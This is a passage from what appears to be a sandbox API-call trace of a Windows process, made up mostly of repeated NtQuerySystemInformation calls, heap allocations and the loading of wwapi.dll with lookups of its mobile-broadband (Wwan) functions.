SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.542] GetProcessHeap () returned 0x27fc8db0000 [0187.542] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x76) returned 0x27fc8e47cd0 [0187.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.554] GetProcessHeap () returned 0x27fc8db0000 [0187.554] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18c) returned 0x27fc8eab480 [0187.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.558] GetProcessHeap () returned 0x27fc8db0000 [0187.558] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x8) returned 0x27fc8e2a340 [0187.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.563] GetProcessHeap () returned 0x27fc8db0000 [0187.563] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x1e0) returned 0x27fc98d9f30 [0187.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfe0, Length=0x30, ResultLength=0x0) [0187.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0187.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0187.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0187.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe000, Length=0x28, ResultLength=0x0) [0187.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x28, ResultLength=0x0) [0187.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x18, ResultLength=0x0) [0187.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0187.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0187.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0187.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x38, ResultLength=0x0) [0187.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.648] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\wwapi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffcd5220000 [0187.697] GetProcAddress (hModule=0x7ffcd5220000, lpProcName="WwanOpenHandle") returned 0x7ffcd5221040 [0187.697] GetProcAddress (hModule=0x7ffcd5220000, lpProcName="WwanCloseHandle") returned 0x7ffcd5226170 [0187.698] GetProcAddress (hModule=0x7ffcd5220000, lpProcName="WwanEnumerateInterfaces") returned 0x7ffcd52270e0 [0187.698] GetProcAddress (hModule=0x7ffcd5220000, lpProcName="WwanQueryInterface") returned 0x7ffcd5228e60 [0187.698] GetProcAddress (hModule=0x7ffcd5220000, lpProcName="WwanFreeMemory") returned 0x7ffcd522cbc0 [0187.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.699] WwanOpenHandle () returned 0x426 [0187.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x20, ResultLength=0x0) [0187.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0187.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0187.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0187.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe000, Length=0x28, ResultLength=0x0) [0187.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x28, ResultLength=0x0) [0187.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x18, ResultLength=0x0) [0187.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.802] NtQuerySystemInformation (SystemInformationClass=0xb9, 